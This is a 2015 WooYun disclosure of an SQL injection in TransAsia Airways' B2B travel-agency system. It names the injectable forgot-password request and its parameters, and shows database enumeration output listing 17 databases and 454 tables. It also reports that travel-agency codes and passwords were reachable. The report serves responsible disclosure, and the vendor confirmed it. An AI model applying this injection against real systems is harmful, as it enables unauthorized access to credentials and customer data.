当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0145962

漏洞标题:台湾復興航空某系统oracle注射(涉及300家旅行社/45万机票延误信息)(臺灣地區)

相关厂商:复兴航空

漏洞作者: 路人甲

提交时间:2015-10-11 14:04

修复时间:2015-11-26 15:18

公开时间:2015-11-26 15:18

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-11: 细节已通知厂商并且等待厂商处理中
2015-10-12: 厂商已经确认,细节仅向厂商公开
2015-10-22: 细节向核心白帽子及相关领域专家公开
2015-11-01: 细节向普通白帽子公开
2015-11-11: 细节向实习白帽子公开
2015-11-26: 细节向公众公开

简要描述:

复兴航空

详细说明:

问题出在:http://**.**.**.**/GE/GE/default.aspx(復興航空B2B系統)
点击忘记密码,在公司帐号和公司代码处有SQL注入

1.png


2.png


直接抓包,通过get型传递数据

http://**.**.**.**/GE/GE/PG/HE/HEP2/HEP2B0/HEP2B0.aspx?AJAX=1&do_action=agt_cd_check&agt_cd=dsfsd*&acct_no=aa&_ele_list=XML&time=1444493269143


参数为agt_cd或者acct_no

3.png


17库

available databases [17]:
[*] ABACUS
[*] APPQOSSYS
[*] BR00
[*] DBSNMP
[*] FLOWS_030000
[*] FLOWS_FILES
[*] OLAPSYS
[*] OUTLN
[*] SB00
[*] SCOTT
[*] SYS
[*] SYSTEM
[*] TSMSYS
[*] WK_TEST
[*] WKSYS
[*] WMSYS
[*] XDB


当前库ABACUS

Database: ABACUS
[454 tables]
+-----------------------+
| AGENT_INFO            |
| AP170                 |
| AX_AGENT              |
| BA_001                |
| CHINAPAYCHECKEDSTATUS |
| CHINAPAYORDER         |
| CHINAPAYORDERDETAIL   |
| CHINAPAY_HE22         |
| CHINAPAY_HE28         |
| CHINAPAY_HE32         |
| CHINAPAY_HE33         |
| CHINAPAY_HE35         |
| CHINAPAY_HE36         |
| CHINAPAY_HE37         |
| CM001                 |
| CM002                 |
| CM003                 |
| CM004                 |
| CM005                 |
| CM006                 |
| CM007                 |
| CM008                 |
| CM009                 |
| CM010                 |
| CM011                 |
| CM012                 |
| CM013                 |
| CM014                 |
| CM015                 |
| CM016                 |
| CM017                 |
| CM018                 |
| CM019                 |
| CM020                 |
| CM021                 |
| CM022                 |
| CM023                 |
| CM024                 |
| CM025                 |
| CM026                 |
| CM027                 |
| CM028                 |
| CM029                 |
| CM030                 |
| CM031                 |
| CM033                 |
| CM035                 |
| CM036                 |
| CM037                 |
| CM_001                |
| CM_001_0322_C         |
| CM_001_D              |
| CM_001_F              |
| CM_002                |
| CM_003                |
| CM_004                |
| CM_004_D              |
| CM_004_F              |
| CM_005                |
| CM_006                |
| CM_007                |
| CM_008                |
| CM_010                |
| CM_010_D              |
| CM_010_F              |
| CM_011                |
| CM_012                |
| CM_013                |
| CM_014                |
| CM_015                |
| CM_016                |
| CM_017                |
| CM_099                |
| CM_905                |
| CM_906                |
| CM_AAB                |
| DELAYTICKETINFO       |
| EC01                  |
| EC02                  |
| EC03                  |
| ERROR_FOREIGNFARE     |
| FOREIGNFARE           |
| FOREIGNFARE_20110826  |
| FOREIGNFARE_COPY      |
| FOREIGNFARE_TEMP      |
| GB23                  |
| GDC_R_ACCOUNT_GROUP   |
| GDC_R_GROUP_SYS_FUNC  |
| GDC_T_ACCOUNT         |
| GDC_T_AUTHORIZE       |
| GDC_T_GROUP           |
| GDC_T_LISTITEM        |
| GDC_T_LISTITEMX       |
| GDC_T_SYS_FUNC        |
| GDC_T_SYS_MENU        |
| GDC_T_SYS_TYPE        |
| GDC_T_SERIALNUMBER    |
| H278                  |
| HE01                  |
| HE01T                 |
| HE02                  |
| HE02T                 |
| HE03                  |
| HE04                  |
| HE05                  |
| HE06                  |
| HE07                  |
| HE08                  |
| HE09                  |
| HE10                  |
| HE100                 |
| HE101                 |
| HE102                 |
| HE102B                |
| HE103                 |
| HE105                 |
| HE106                 |
| HE107                 |
| HE108                 |
| HE109                 |
| HE11                  |
| HE110                 |
| HE110_BK              |
| HE111                 |
| HE112                 |
| HE113                 |
| HE114                 |
| HE115                 |
| HE116                 |
| HE117                 |
| HE118                 |
| HE119                 |
| HE11_F                |
| HE12                  |
| HE123                 |
| HE125                 |
| HE126                 |
| HE127                 |
| HE127_F               |
| HE128                 |
| HE12_0321_C           |
| HE12_0322R_C          |
| HE12_0328R            |
| HE12_D                |
| HE12_F                |
| HE13                  |
| HE130                 |
| HE130_F               |
| HE131                 |
| HE131_0322R           |
| HE131_0328R           |
| HE132                 |
| HE133                 |
| HE135                 |
| HE136                 |
| HE137                 |
| HE138                 |
| HE139                 |
| HE13_1                |
| HE13_F                |
| HE13_T                |
| HE14                  |
| HE140                 |
| HE142                 |
| HE144                 |
| HE145                 |
| HE146                 |
| HE147                 |
| HE148                 |
| HE149                 |
| HE15                  |
| HE150                 |
| HE151                 |
| HE152                 |
| HE153                 |
| HE154                 |
| HE155                 |
| HE156                 |
| HE157                 |
| HE158                 |
| HE159                 |
| HE16                  |
| HE160                 |
| HE161                 |
| HE162                 |
| HE162_D               |
| HE162_F               |
| HE163                 |
| HE164                 |
| HE166                 |
| HE167                 |
| HE168                 |
| HE169                 |
| HE17                  |
| HE170                 |
| HE171                 |
| HE171_T               |
| HE172                 |
| HE172_T               |
| HE173                 |
| HE174                 |
| HE175                 |
| HE176                 |
| HE177                 |
| HE178                 |
| HE179                 |
| HE18                  |
| HE180                 |
| HE181                 |
| HE182                 |
| HE183                 |
| HE184                 |
| HE185                 |
| HE186                 |
| HE187                 |
| HE19                  |
| HE190                 |
| HE191                 |
| HE192                 |
| HE193                 |
| HE194                 |
| HE195                 |
| HE196                 |
| HE197                 |
| HE198                 |
| HE199                 |
| HE20                  |
| HE200                 |
| HE201                 |
| HE202                 |
| HE203                 |
| HE204                 |
| HE206                 |
| HE207                 |
| HE208                 |
| HE209                 |
| HE21                  |
| HE210                 |
| HE211                 |
| HE213                 |
| HE214                 |
| HE215                 |
| HE216                 |
| HE216_T               |
| HE217                 |
| HE218                 |
| HE219                 |
| HE22                  |
| HE220                 |
| HE221                 |
| HE222                 |
| HE223                 |
| HE224                 |
| HE225                 |
| HE226                 |
| HE227                 |
| HE228                 |
| HE229                 |
| HE22B                 |
| HE23                  |
| HE230                 |
| HE231                 |
| HE232                 |
| HE233                 |
| HE234                 |
| HE235                 |
| HE236                 |
| HE237                 |
| HE238                 |
| HE239                 |
| HE23_0321_C           |
| HE23_0322R_C          |
| HE23_D                |
| HE23_F                |
| HE24                  |
| HE240                 |
| HE241                 |
| HE242                 |
| HE243                 |
| HE244                 |
| HE245                 |
| HE246                 |
| HE247                 |
| HE248                 |
| HE249                 |
| HE24_0213             |
| HE24_0321             |
| HE24_0322R            |
| HE24_0328R            |
| HE25                  |
| HE250                 |
| HE251                 |
| HE252                 |
| HE254                 |
| HE255                 |
| HE256                 |
| HE257                 |
| HE258                 |
| HE259                 |
| HE26                  |
| HE260                 |
| HE261                 |
| HE262                 |
| HE263                 |
| HE264                 |
| HE265                 |
| HE266                 |
| HE267                 |
| HE268                 |
| HE269                 |
| HE27                  |
| HE270                 |
| HE271                 |
| HE272                 |
| HE273                 |
| HE274                 |
| HE275                 |
| HE276                 |
| HE277                 |
| HE28                  |
| HE30                  |
| HE31                  |
| HE32                  |
| HE33                  |
| HE34                  |
| HE35                  |
| HE36                  |
| HE37                  |
| HE37_B                |
| HE38                  |
| HE39                  |
| HE40                  |
| HE41                  |
| HE42                  |
| HE43                  |
| HE44                  |
| HE45                  |
| HE46                  |
| HE47                  |
| HE48                  |
| HE49                  |
| HE50                  |
| HE50_B                |
| HE51                  |
| HE54                  |
| HE55                  |
| HE56                  |
| HE57                  |
| HE59                  |
| HE60                  |
| HE61                  |
| HE62                  |
| HE63                  |
| HE64                  |
| HE65                  |
| HE66                  |
| HE67                  |
| HE68                  |
| HE69                  |
| HE70                  |
| HE71                  |
| HE72                  |
| HE73                  |
| HE74                  |
| HE75                  |
| HE76                  |
| HE77                  |
| HE78                  |
| HE79                  |
| HE80                  |
| HE81                  |
| HE84                  |
| HE85                  |
| HE86                  |
| HE87                  |
| HE88                  |
| HE91                  |
| HE92                  |
| HE93                  |
| HE94                  |
| HE95                  |
| HE96                  |
| HE96_0322_C           |
| HE96_D                |
| HE96_F                |
| HE97                  |
| HE98                  |
| HE99                  |
| HE_T1                 |
| HE_TEMP               |
| HL01                  |
| HL02                  |
| HL03                  |
| HL04                  |
| HL05                  |
| HL06                  |
| HL07                  |
| HL08                  |
| HM01                  |
| HM02                  |
| HM03                  |
| HM04                  |
| ISSUETICKETTABLE      |
| LA_000                |
| LF_000                |
| PBCATCOL              |
| PBCATEDT              |
| PBCATFMT              |
| PBCATTBL              |
| PBCATVLD              |
| PFVBC01               |
| PLAN_TABLE            |
| PY_P02                |
| SA37                  |
| SA38                  |
| SA39                  |
| SA40                  |
| SA41                  |
| SA42                  |
| SA43                  |
| SA44                  |
| SA44_B                |
| SA44_R                |
| SA45                  |
| SA46                  |
| SA47                  |
| SA48                  |
| SA95                  |
| SA96                  |
| SA97                  |
| SA98                  |
| SA99                  |
| SC01                  |
| SC22                  |
| SC23                  |
| SC24                  |
| SC25                  |
| SC26                  |
| TAXINFO               |
| TAXINFO_20110826      |
| TAXINFO_COPY          |
| TAXINFO_TEMP          |
| TKTTMP                |
| WA02                  |
| WA04                  |
| WA21                  |
| WA21T                 |
| WA33                  |
| WA34                  |
| WA35                  |
| _LISTITEM             |
| _LOGINHISTORY         |
| _TEMPLATE             |
| _TRANSACTIONLOG       |
+-----------------------+


agent_info表,涉及358家旅行社,包括旅行社代码,密码等

4.png


DELAYTICKETINFO表(延期票务信息)

5.png


漏洞证明:

5.png

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-10-12 15:16

厂商回复:

感謝通報

最新状态:

暂无

漏洞评价:

评价